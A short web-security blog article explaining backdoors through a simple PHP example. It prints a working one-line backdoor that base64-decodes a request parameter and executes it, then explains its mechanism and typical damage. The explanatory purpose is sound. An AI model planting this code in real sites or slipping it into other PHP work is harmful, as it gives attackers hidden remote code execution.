Quick Analysis of a Simple PHP Backdoor

What is a backdoor and how it works

PHP Backdoor

Here’s an extremely simple analysis of a PHP Backdoor to help understand what a backdoor is and how it works.

What is a Backdoor?

A backdoor is a typically covert method of bypassing normal authentication or encryption in a computer, product, embedded device, or its embodiment. Backdoors are most often used for securing remote access to a computer, or obtaining access to plaintext in cryptographic systems.

To put it simply, a backdoor is a secret entry into the server (or the website in this case).

Example of a Simple PHP Backdoor

Here’s an example of a simple PHP script that allows a remote attacker to “do stuff” inside your website.

<?php
if(!empty($_REQUEST['fcb'])){$fcb=base64_decode($_REQUEST['fcb']);$fcb=create_function('',$fcb);@$fcb();exit;}

In order to understand what’s happening, let’s first format the code to make it legible.

<?php
if ( ! empty( $_REQUEST['fcb'] ) ) {
    $fcb =base64_decode($_REQUEST['fcb']);
    $fcb =create_function('',$fcb );
    @$fcb();
    exit;
}

How Does This PHP Backdoor Work?

So, essentially someone can pass a payload as a base64 encoded value in a GET or POST variable to the website.

The website will accept it, decode it, create a function from the payload on-the-fly and finally, silently attempt to execute it.

As with most of the backdoor, the attacker can pass any payload and depending on the PHP configuration, the attacker can do almost anything that can be done with PHP.

What Damage Can It Potentially Cause?

The backdoors can potentially edit the webserver directory index page of site, enabling the hackers to leave their mark or “deface” the site. Hackers may also use it to bruteforce FTP or cPanel, allowing them more access to the website resulting in deletion of all the files, transfer of data to the attacker… and in one case, it infected about 200,000 JavaScript files with cryptomining code. This meant that the site would start cryptomining the moment any visitor visits any of the pages of the website. How would you clean 200,000 infected files spread over 18GB?

See Also:

This article is written by Evelyn Allison. Evelyn has over two decades of experience with the big-tech corporate giants. Starting in 2002 with consumer IT remote support, he transitioned into IT enterprise support and systems provisioning for Windows and Linux servers. Her prowess spans her expertise in network security, security audit and scripting-based-automation. Actively involved in web security since 2017, Evelyn has worked with various technologies to secure the web, leveraging tech like Nginx, modsecurity, reverse-proxies, developing web-application-firewalls, on-the-fly asset optimization using Google’s PageSpeed Module and more. Her expertise is reflected in the top-tier plugins and comprehensive consulting-services she offers in the domain of web-security.